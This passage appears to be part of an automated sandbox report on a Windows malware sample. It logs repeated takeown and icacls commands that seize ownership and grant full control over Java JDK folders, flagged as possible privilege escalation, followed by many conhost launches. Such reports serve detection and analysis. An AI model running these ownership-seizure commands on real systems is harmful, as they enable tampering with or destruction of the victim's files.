  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444" /grant Administrators:F
  2⤵
  PID:1724
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF" /a
  2⤵
  - Modifies file permissions
  PID:1204
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF" /grant Administrators:F
  2⤵
  PID:1556
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444" /a
  2⤵
  PID:2556
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444" /grant Administrators:F
  2⤵
  PID:2528
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF" /a
  2⤵
  PID:1984
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF" /grant Administrators:F
  2⤵
  PID:2952
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444" /a
  2⤵
  PID:1880
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444" /grant Administrators:F
  2⤵
  PID:2848
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF" /a
  2⤵
  PID:2356
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF" /grant Administrators:F
  2⤵
  PID:1868
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444" /a
  2⤵
  - Modifies file permissions
  PID:2624
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444" /grant Administrators:F
  2⤵
  PID:2704
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF" /a
  2⤵
  PID:1736
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:204
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043" /a
  2⤵
  PID:2488
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043" /grant Administrators:F
  2⤵
  PID:2144
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF" /a
  2⤵
  PID:2440
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF" /grant Administrators:F
  2⤵
  PID:1256
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043" /a
  2⤵
  PID:2280
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043" /grant Administrators:F
  2⤵
  PID:1452
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF" /a
  2⤵
  PID:1636
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF" /grant Administrators:F
  2⤵
  PID:620
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116" /a
  2⤵
  PID:2164
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116" /grant Administrators:F
  2⤵
  PID:2652
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1376
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF" /grant Administrators:F
  2⤵
  PID:2600
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1052
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116" /grant Administrators:F
  2⤵
  PID:212
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF" /a
  2⤵
  PID:2052
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2644
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301" /a
  2⤵
  PID:2424
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301" /grant Administrators:F
  2⤵
  PID:1660
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF" /a
  2⤵
  PID:2124
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF" /grant Administrators:F
  2⤵
  PID:2640
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301" /a
  2⤵
  PID:448
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301" /grant Administrators:F
  2⤵
  PID:1672
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF" /a
  2⤵
  PID:216
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF" /grant Administrators:F
  2⤵
  PID:868
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2" /a
  2⤵
  PID:580
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2" /grant Administrators:F
  2⤵
  PID:1012
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core" /a
  2⤵
  PID:1944
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:984
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache" /a
  2⤵
  PID:2556
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache" /grant Administrators:F
  2⤵
  PID:2688
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary" /a
  2⤵
  PID:2208
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary" /grant Administrators:F
  2⤵
  PID:2772
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine" /a
  2⤵
  PID:2444
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine" /grant Administrators:F
  2⤵
  PID:1872
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings" /a
  2⤵
  PID:3016
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings" /grant Administrators:F
  2⤵
  PID:2104
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry" /a
  2⤵
  PID:2848
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry" /grant Administrators:F
  2⤵
  PID:2832
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1064
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile" /grant Administrators:F
  2⤵
  PID:208
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\.data" /a
  2⤵
  PID:1704
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\.data" /grant Administrators:F
  2⤵
  PID:1824
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins" /a
  2⤵
  PID:1272
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins" /grant Administrators:F
  2⤵
  PID:1752
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303" /a
  2⤵
  PID:1372
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303" /grant Administrators:F
  2⤵
  PID:1276
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html" /a
  2⤵
  PID:1392
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 1804 -s 1844
  2⤵
  PID:1256
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html" /grant Administrators:F
  2⤵
  PID:2164

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1512

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1400907362-791134422861873139-136949251156119629517822520-1991155291-810964863"
1⤵
PID:1952

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1317481680-7996848678650499071812710446923406398-1719506386-11213930951575983094"
1⤵
PID:2104

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "177075872351700655-1633104989-522988613-12127701721496001008186030100-343733131"
1⤵
PID:1584

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1617130961863903389-800919562-7955543281104194676-18353814182017305258-257300993"
1⤵
PID:1384

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "770340742-123987420643641967326636144-9734805271883595031-40904509-421861926"
1⤵
PID:2948

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2215182341904218523-941683199-37139947-137862527117995908802110876981663330574"
1⤵
PID:2756

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1440957963-1398473460437005805-1361521603-5607150621790360978-215871528-1188642728"
1⤵
PID:3000

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1666246647-956637276962008025-1902567253-73631741213714923-20320016031632253055"
1⤵
PID:2036

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1451032314474267516-1656403131-1101409887466911028-87280472263029413405790966"
1⤵
PID:1728

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-801159043-776393314-34750084-5065635091015629830-1421624131147098916-1307894375"
1⤵
PID:1036

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1966505358-495113775-1684497534-20151182201753212122122489781-1448310770-1187250935"
1⤵
PID:1772

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1550365564-1926802820-1303069771-10997888104946222132011689974-5317855831563726276"
1⤵
PID:2708

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "203657349628456013817078757758418952721178515015-459417800165050490199122128"
1⤵
PID:2444

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "191625072988790601414942408041945563355-144854018712816557551407600179614476322"
1⤵
PID:1716

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "64531954265677841817916498201153538486-2126079117-211585323-12424759681960529798"
1⤵
PID:2052

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1615987878-350707318-159501328535549012-1087136891-61324238-7211556781912247711"
1⤵
PID:2372

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "7917774601407504842-1764479690-302009096227499841-1696258617-676405557-1552664171"
1⤵
PID:3056

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1376010261642521519-1739854749-714940452-1820345996-644212590-1043945188-23593134"
1⤵
PID:2352

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-77322934015582262582019447474-1837677569692909610444590631-20354406371165393807"
1⤵
PID:2796

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1736764189-2007419049-9992998041273071061-1886900047-957232387-6537792151755574044"
1⤵
PID:2056

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "171128205-907014610-410748004-1482930056-784439300-4117878621399057632314139432"
1⤵
PID:216

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1245158460-975363363-7611282021210368860-9579292422035995137-6585854761412769518"
1⤵
PID:1568

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1646468482-1407710367-523325327-1542168333-256994220-78752790-1585909461468728846"
1⤵
PID:884

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2500865015639444821650449674-7619598587293447211115453157539942279-943111933"
1⤵
PID:2708

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "55652339318083632167352510641215819756-674830323930318629-21386843561640900321"
1⤵
PID:1840

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1998194419-1433046138-147963224714955787531972234952-1308812693-20520913441127605194"
1⤵
PID:276

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1102218212669779973-1533320981-1332892491586004758593120514-8643625591861126709"
1⤵
PID:1644

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-899245721-20095740901845752020-31304299053985844106197129-2272943021552088707"
1⤵
PID:2508

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "11337574171014047864-6556898591478560581-1188796598195064320681224606-1735141311"
1⤵
PID:716

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-547927971-5587921255044176903172691724026820691093608371426881849-225734618"
1⤵
PID:1308

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1162459246-16820395171258641241-7441756281158736330-1817625325-1694983935-1615781493"
1⤵
PID:2556

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-936470907-1003374981713114322-34322176-152231983-16850410888215552801750440565"
1⤵
PID:2084

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-347429412-1613629836566423668287194378-1293990091-2017034424-872179146-358494104"
1⤵
PID:1872

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-10628054812001019043-629272676-100644571014900266561212894898-2035553550-733800790"
1⤵
PID:2128

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1646308171-487865652135670265-702713943-467363021-30459588515244617072024164307"
1⤵
PID:1272

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "10177294931112434714-1041186238-1463651521-6548321671992364349-1762022566317529824"
1⤵
PID:2364

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-650205900-1560458914135889204214839419321752982146-207222323314447938341881096343"
1⤵
PID:2328

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "197976614-143071862218490517861663882982-582857912-7606910197519925989286411"
1⤵
PID:216

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "4599892102069448654836086241-1272122214206322581-856556376-2063584842-655477711"
1⤵
PID:2924

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "69902061-1277887888-13865899421603484725103759756115293938296954242952133285270"
1⤵
PID:2044

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1728716628-4733564151383106524-92706835573564661-675368995-759033019824293144"
1⤵
PID:2964

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1476347199923860338-166021267214847850574494726731447081653170855693830132530"
1⤵
PID:2448

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-752064966-2064164142201587757632199194-652033968-1406194405-1229375786-676424505"
1⤵
PID:2828

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-143172129-1271961612112618843611561854592079324701-1701192925229881451595782349"
1⤵
PID:2672

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "607845744-1218527110547657856-2083241883-8366097751884406385-1385819348-474145058"
1⤵
PID:1732

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-572704209-105429436157458829818459414281916285041-1200758517-11945610411059066542"
1⤵
PID:1928

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1479452544-8040687997548091971283152306-221766565-1413296853211185361110957067"
1⤵
PID:712

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-943487520-18283763192117217181921246752-145950977914363988161031142029774700321"
1⤵
PID:1764

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-4321475-161231395860022812858344449455102586520623787376721023941058970503"
1⤵
PID:1332

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "10305984481074496107884000792-1905080406-411390462-1099822098-1887003046-1845304893"
1⤵
PID:1652

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1303185635-460573741-42748921226104658-19434238741978998240-1315471074923205914"
1⤵
PID:1656

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "89626459-1999899982-98033456155300080710262645811256585196-255415749-1153868267"
1⤵
PID:2244

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1467628538-8879627501207304496-151841066-1809356560-449375021137675972990901730"
1⤵
PID:2368

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-406458645-524890718-156461333114894312294191561091273064801801094390403934287"
1⤵
PID:1640

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "198632439753493017175280931-207855372019469532712581616165578225-1752337352"
1⤵
PID:1588

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1065955762447912376-1962175490-630039822-156592698-145921702910887528131079464673"
1⤵
PID:1576

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1076225465-5070200347630325039193624631967388618-4744392141619229893-123892984"
1⤵
PID:2044

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2142234859538561284-1676119152773439980-1527103474-30942292515877114651342177275"
1⤵
PID:224

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-129529320511532922491438307233-394559543571516248-1998491773-1619674861-54056725"
1⤵
PID:2716

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "13786333932121190786-150309345416470050531638704558-2330684151454975798-2104367150"
1⤵
PID:2284

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "18518968633721656981073803691629109275-675643500-1090261335-136998312-1058636086"
1⤵
PID:320

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "29917447495102765765191930-1966878989417441726-217789321-220949974-570783125"
1⤵
PID:1372

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "19753276031273430500-1051178333-21033138461622920430975677786-1456225795-1860030312"
1⤵
PID:2432

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1173196637-1450689242046020419-353450170-2134507128-1106278778119682260741013387"
1⤵
PID:1392

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1381375291422192739119562183-20962938231463214948-2011849057-243162488812328898"
1⤵
PID:220

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-878674507-55601360-104931370437920858-46340729564789595-118812620237282816"
1⤵
PID:2300

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1441656776948025712710773369-124827902310128092762092083023-700666978-319290258"
1⤵
PID:2804

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1515584390-594840839512616809-18835822001969781646-532136-3331142951521953709"
1⤵
PID:1284

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1264375175644459769-5907132361893223698759938643726380061914251636-1995660506"
1⤵
PID:1620

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-895295428-3897359631479423258-1452310776-660551335860157251857571343973738493"
1⤵
PID:544

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-24588015-7612697667970249711422124780749176477-754135069-14157260331614481252"
1⤵
PID:1552

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "16900943571292194024-10465251451426119419516631841180054668229694449-346008002"
1⤵
PID:1084

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-19738435701984464778-19670486071982222735174101738-1647507612-1931773893-2055659266"
1⤵
PID:1964

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-27726585715650084862422209942005564411-16218097752001005409-19577714841359881217"
1⤵
PID:2320

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "625134970-715193079119053742157683346-20991964481474856819-1287433680-971990825"
1⤵
PID:2324

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "483756736337571394-11578763855464693012009659757-567742811-862726566-191796498"
1⤵
PID:1968

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "451157775-6989368012188270351622087979-573195381-7074142211861530130251258931"
1⤵
PID:2448

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-7282727101792838821-2117234063-663712381-2063718471887964212-1168929212-212189264"
1⤵
PID:2872

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1651374042612805330-180957948-1829686974-124985672-2003897081-1614890084-1195445867"
1⤵
PID:1816

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "620791291859664762-399106131-61561217411479445091110993099-9468165781724728811"
1⤵
PID:2068

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1354637310-2136412856-194184770573199164-16286681891041212598-194301610-443397379"
1⤵
PID:2092

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-21278816611990415993-1075540251267634304140562357434808296380728731798298805"
1⤵
PID:1520

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "299280819-133847738010652559117126728134791025711099989775-425473066-430583747"
1⤵
PID:2428

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "14442040234802265441221980091-7344181141424197462-208580689-797012249204431821"
1⤵
PID:1708

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-4424481711452920672-2026357898-114045889-1401324365-1131067624-885182327-2115376700"
1⤵
PID:1960

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "380211393668296341-13171168016880632148534689431264700597-309089742-1495415568"
1⤵
PID:1336

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1166801004757303568378098474-1674067998-36853709119060713771674697202-393632326"
1⤵
PID:604

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "453956942-1508855503-1208132122347345111195513991367686482-3517564501486941883"
1⤵
PID:2780

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "152439166-1584024609-1749265085-1787231506-17978292031794762574-1679960982-660497776"
1⤵
PID:2792

